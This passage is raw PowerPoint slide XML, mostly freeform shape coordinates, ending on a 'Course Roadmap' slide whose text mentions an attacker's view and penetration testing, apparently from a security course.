                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="52"/>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3103" name="Freeform 107"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="456" y="2567"/>
                <a:ext cx="22" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 65"/>
                  <a:gd name="T1" fmla="*/ 0 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 65"/>
                  <a:gd name="T3" fmla="*/ 0 h 23"/>
                  <a:gd name="T4" fmla="*/ 0 w 65"/>
                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 65"/>
                  <a:gd name="T7" fmla="*/ 0 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 65"/>
                  <a:gd name="T9" fmla="*/ 0 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 65"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 0 w 65"/>
                  <a:gd name="T13" fmla="*/ 0 h 23"/>
                  <a:gd name="T14" fmla="*/ 0 w 65"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 65"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 0 w 65"/>
                  <a:gd name="T19" fmla="*/ 0 h 23"/>
                  <a:gd name="T20" fmla="*/ 0 w 65"/>
                  <a:gd name="T21" fmla="*/ 0 h 23"/>
                  <a:gd name="T22" fmla="*/ 0 w 65"/>
                  <a:gd name="T23" fmla="*/ 0 h 23"/>
                  <a:gd name="T24" fmla="*/ 0 w 65"/>
                  <a:gd name="T25" fmla="*/ 0 h 23"/>
                  <a:gd name="T26" fmla="*/ 0 w 65"/>
                  <a:gd name="T27" fmla="*/ 0 h 23"/>
                  <a:gd name="T28" fmla="*/ 0 w 65"/>
                  <a:gd name="T29" fmla="*/ 0 h 23"/>
                  <a:gd name="T30" fmla="*/ 0 w 65"/>
                  <a:gd name="T31" fmla="*/ 0 h 23"/>
                  <a:gd name="T32" fmla="*/ 0 w 65"/>
                  <a:gd name="T33" fmla="*/ 0 h 23"/>
                  <a:gd name="T34" fmla="*/ 0 w 65"/>
                  <a:gd name="T35" fmla="*/ 0 h 23"/>
                  <a:gd name="T36" fmla="*/ 0 w 65"/>
                  <a:gd name="T37" fmla="*/ 0 h 23"/>
                  <a:gd name="T38" fmla="*/ 0 w 65"/>
                  <a:gd name="T39" fmla="*/ 0 h 23"/>
                  <a:gd name="T40" fmla="*/ 0 w 65"/>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3"/>
                  <a:gd name="T65" fmla="*/ 65 w 65"/>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3">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0"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3104" name="Freeform 108"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="383" y="2461"/>
                <a:ext cx="11" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 31"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                  <a:gd name="T7" fmla="*/ 0 h 28"/>
                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                  <a:gd name="T9" fmla="*/ 0 h 28"/>
                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                  <a:gd name="T11" fmla="*/ 0 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                  <a:gd name="T13" fmla="*/ 0 h 28"/>
                  <a:gd name="T14" fmla="*/ 0 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 0 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 0 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 28"/>
                  <a:gd name="T20" fmla="*/ 0 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 28"/>
                  <a:gd name="T22" fmla="*/ 0 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 0 w 31"/>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28"/>
                  <a:gd name="T41" fmla="*/ 31 w 31"/>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28">
                    <a:moveTo>
                      <a:pt x="21" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21"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3105" name="Freeform 109"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="349" y="2396"/>
                <a:ext cx="57" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 176"/>
                  <a:gd name="T1" fmla="*/ 0 h 72"/>
                  <a:gd name="T2" fmla="*/ 0 w 176"/>
                  <a:gd name="T3" fmla="*/ 0 h 72"/>
                  <a:gd name="T4" fmla="*/ 0 w 176"/>
                  <a:gd name="T5" fmla="*/ 0 h 72"/>
                  <a:gd name="T6" fmla="*/ 0 w 176"/>
                  <a:gd name="T7" fmla="*/ 0 h 72"/>
                  <a:gd name="T8" fmla="*/ 0 w 176"/>
                  <a:gd name="T9" fmla="*/ 0 h 72"/>
                  <a:gd name="T10" fmla="*/ 0 w 176"/>
                  <a:gd name="T11" fmla="*/ 0 h 72"/>
                  <a:gd name="T12" fmla="*/ 0 w 176"/>
                  <a:gd name="T13" fmla="*/ 0 h 72"/>
                  <a:gd name="T14" fmla="*/ 0 w 176"/>
                  <a:gd name="T15" fmla="*/ 0 h 72"/>
                  <a:gd name="T16" fmla="*/ 0 w 176"/>
                  <a:gd name="T17" fmla="*/ 0 h 72"/>
                  <a:gd name="T18" fmla="*/ 0 w 176"/>
                  <a:gd name="T19" fmla="*/ 0 h 72"/>
                  <a:gd name="T20" fmla="*/ 0 w 176"/>
                  <a:gd name="T21" fmla="*/ 0 h 72"/>
                  <a:gd name="T22" fmla="*/ 0 w 176"/>
                  <a:gd name="T23" fmla="*/ 0 h 72"/>
                  <a:gd name="T24" fmla="*/ 0 w 176"/>
                  <a:gd name="T25" fmla="*/ 0 h 72"/>
                  <a:gd name="T26" fmla="*/ 0 w 176"/>
                  <a:gd name="T27" fmla="*/ 0 h 72"/>
                  <a:gd name="T28" fmla="*/ 0 w 176"/>
                  <a:gd name="T29" fmla="*/ 0 h 72"/>
                  <a:gd name="T30" fmla="*/ 0 w 176"/>
                  <a:gd name="T31" fmla="*/ 0 h 72"/>
                  <a:gd name="T32" fmla="*/ 0 w 176"/>
                  <a:gd name="T33" fmla="*/ 0 h 72"/>
                  <a:gd name="T34" fmla="*/ 0 w 176"/>
                  <a:gd name="T35" fmla="*/ 0 h 72"/>
                  <a:gd name="T36" fmla="*/ 0 w 176"/>
                  <a:gd name="T37" fmla="*/ 0 h 72"/>
                  <a:gd name="T38" fmla="*/ 0 w 176"/>
                  <a:gd name="T39" fmla="*/ 0 h 72"/>
                  <a:gd name="T40" fmla="*/ 0 w 176"/>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6"/>
                  <a:gd name="T64" fmla="*/ 0 h 72"/>
                  <a:gd name="T65" fmla="*/ 176 w 176"/>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6" h="72">
                    <a:moveTo>
                      <a:pt x="170" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="172" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170"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3106" name="Freeform 110"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="300" y="2474"/>
                <a:ext cx="10" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 71"/>
                  <a:gd name="T2" fmla="*/ 0 w 31"/>
                  <a:gd name="T3" fmla="*/ 0 h 71"/>
                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                  <a:gd name="T5" fmla="*/ 0 h 71"/>
                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                  <a:gd name="T7" fmla="*/ 0 h 71"/>
                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                  <a:gd name="T9" fmla="*/ 0 h 71"/>
                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                  <a:gd name="T11" fmla="*/ 0 h 71"/>
                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                  <a:gd name="T13" fmla="*/ 0 h 71"/>
                  <a:gd name="T14" fmla="*/ 0 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 71"/>
                  <a:gd name="T16" fmla="*/ 0 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 71"/>
                  <a:gd name="T18" fmla="*/ 0 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 71"/>
                  <a:gd name="T22" fmla="*/ 0 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 71"/>
                  <a:gd name="T24" fmla="*/ 0 w 31"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 0 w 31"/>
                  <a:gd name="T27" fmla="*/ 0 h 71"/>
                  <a:gd name="T28" fmla="*/ 0 w 31"/>
                  <a:gd name="T29" fmla="*/ 0 h 71"/>
                  <a:gd name="T30" fmla="*/ 0 w 31"/>
                  <a:gd name="T31" fmla="*/ 0 h 71"/>
                  <a:gd name="T32" fmla="*/ 0 w 31"/>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71"/>
                  <a:gd name="T53" fmla="*/ 31 w 31"/>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71">
                    <a:moveTo>
                      <a:pt x="0" y="69"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="69"/>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3107" name="Freeform 111"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="309" y="2499"/>
                <a:ext cx="23" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 72"/>
                  <a:gd name="T1" fmla="*/ 0 h 70"/>
                  <a:gd name="T2" fmla="*/ 0 w 72"/>
                  <a:gd name="T3" fmla="*/ 0 h 70"/>
                  <a:gd name="T4" fmla="*/ 0 w 72"/>
                  <a:gd name="T5" fmla="*/ 0 h 70"/>
                  <a:gd name="T6" fmla="*/ 0 w 72"/>
                  <a:gd name="T7" fmla="*/ 0 h 70"/>
                  <a:gd name="T8" fmla="*/ 0 w 72"/>
                  <a:gd name="T9" fmla="*/ 0 h 70"/>
                  <a:gd name="T10" fmla="*/ 0 w 72"/>
                  <a:gd name="T11" fmla="*/ 0 h 70"/>
                  <a:gd name="T12" fmla="*/ 0 w 72"/>
                  <a:gd name="T13" fmla="*/ 0 h 70"/>
                  <a:gd name="T14" fmla="*/ 0 w 72"/>
                  <a:gd name="T15" fmla="*/ 0 h 70"/>
                  <a:gd name="T16" fmla="*/ 0 w 72"/>
                  <a:gd name="T17" fmla="*/ 0 h 70"/>
                  <a:gd name="T18" fmla="*/ 0 w 72"/>
                  <a:gd name="T19" fmla="*/ 0 h 70"/>
                  <a:gd name="T20" fmla="*/ 0 w 72"/>
                  <a:gd name="T21" fmla="*/ 0 h 70"/>
                  <a:gd name="T22" fmla="*/ 0 w 72"/>
                  <a:gd name="T23" fmla="*/ 0 h 70"/>
                  <a:gd name="T24" fmla="*/ 0 w 72"/>
                  <a:gd name="T25" fmla="*/ 0 h 70"/>
                  <a:gd name="T26" fmla="*/ 0 w 72"/>
                  <a:gd name="T27" fmla="*/ 0 h 70"/>
                  <a:gd name="T28" fmla="*/ 0 w 72"/>
                  <a:gd name="T29" fmla="*/ 0 h 70"/>
                  <a:gd name="T30" fmla="*/ 0 w 72"/>
                  <a:gd name="T31" fmla="*/ 0 h 70"/>
                  <a:gd name="T32" fmla="*/ 0 w 72"/>
                  <a:gd name="T33" fmla="*/ 0 h 70"/>
                  <a:gd name="T34" fmla="*/ 0 w 72"/>
                  <a:gd name="T35" fmla="*/ 0 h 70"/>
                  <a:gd name="T36" fmla="*/ 0 w 72"/>
                  <a:gd name="T37" fmla="*/ 0 h 70"/>
                  <a:gd name="T38" fmla="*/ 0 w 72"/>
                  <a:gd name="T39" fmla="*/ 0 h 70"/>
                  <a:gd name="T40" fmla="*/ 0 w 72"/>
                  <a:gd name="T41" fmla="*/ 0 h 70"/>
                  <a:gd name="T42" fmla="*/ 0 w 72"/>
                  <a:gd name="T43" fmla="*/ 0 h 70"/>
                  <a:gd name="T44" fmla="*/ 0 w 72"/>
                  <a:gd name="T45" fmla="*/ 0 h 70"/>
                  <a:gd name="T46" fmla="*/ 0 w 72"/>
                  <a:gd name="T47" fmla="*/ 0 h 70"/>
                  <a:gd name="T48" fmla="*/ 0 w 72"/>
                  <a:gd name="T49" fmla="*/ 0 h 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70"/>
                  <a:gd name="T77" fmla="*/ 72 w 72"/>
                  <a:gd name="T78" fmla="*/ 70 h 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70">
                    <a:moveTo>
                      <a:pt x="19" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19"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3108" name="Freeform 112"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="310" y="2485"/>
                <a:ext cx="5" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 16"/>
                  <a:gd name="T1" fmla="*/ 0 h 30"/>
                  <a:gd name="T2" fmla="*/ 0 w 16"/>
                  <a:gd name="T3" fmla="*/ 0 h 30"/>
                  <a:gd name="T4" fmla="*/ 0 w 16"/>
                  <a:gd name="T5" fmla="*/ 0 h 30"/>
                  <a:gd name="T6" fmla="*/ 0 w 16"/>
                  <a:gd name="T7" fmla="*/ 0 h 30"/>
                  <a:gd name="T8" fmla="*/ 0 w 16"/>
                  <a:gd name="T9" fmla="*/ 0 h 30"/>
                  <a:gd name="T10" fmla="*/ 0 w 16"/>
                  <a:gd name="T11" fmla="*/ 0 h 30"/>
                  <a:gd name="T12" fmla="*/ 0 w 16"/>
                  <a:gd name="T13" fmla="*/ 0 h 30"/>
                  <a:gd name="T14" fmla="*/ 0 w 16"/>
                  <a:gd name="T15" fmla="*/ 0 h 30"/>
                  <a:gd name="T16" fmla="*/ 0 w 16"/>
                  <a:gd name="T17" fmla="*/ 0 h 30"/>
                  <a:gd name="T18" fmla="*/ 0 w 16"/>
                  <a:gd name="T19" fmla="*/ 0 h 30"/>
                  <a:gd name="T20" fmla="*/ 0 w 16"/>
                  <a:gd name="T21" fmla="*/ 0 h 30"/>
                  <a:gd name="T22" fmla="*/ 0 w 16"/>
                  <a:gd name="T23" fmla="*/ 0 h 30"/>
                  <a:gd name="T24" fmla="*/ 0 w 16"/>
                  <a:gd name="T25" fmla="*/ 0 h 30"/>
                  <a:gd name="T26" fmla="*/ 0 w 16"/>
                  <a:gd name="T27" fmla="*/ 0 h 30"/>
                  <a:gd name="T28" fmla="*/ 0 w 16"/>
                  <a:gd name="T29" fmla="*/ 0 h 30"/>
                  <a:gd name="T30" fmla="*/ 0 w 16"/>
                  <a:gd name="T31" fmla="*/ 0 h 30"/>
                  <a:gd name="T32" fmla="*/ 0 w 16"/>
                  <a:gd name="T33" fmla="*/ 0 h 30"/>
                  <a:gd name="T34" fmla="*/ 0 w 16"/>
                  <a:gd name="T35" fmla="*/ 0 h 30"/>
                  <a:gd name="T36" fmla="*/ 0 w 16"/>
                  <a:gd name="T37" fmla="*/ 0 h 30"/>
                  <a:gd name="T38" fmla="*/ 0 w 16"/>
                  <a:gd name="T39" fmla="*/ 0 h 30"/>
                  <a:gd name="T40" fmla="*/ 0 w 16"/>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
                  <a:gd name="T64" fmla="*/ 0 h 30"/>
                  <a:gd name="T65" fmla="*/ 16 w 16"/>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 h="30">
                    <a:moveTo>
                      <a:pt x="7" y="30"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="3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grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3081"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24200" y="5116513"/>
            <a:ext cx="762000" cy="1089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82"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5400" y="5006975"/>
            <a:ext cx="838200" cy="1198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83"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62800" y="5051425"/>
            <a:ext cx="838200" cy="1196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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
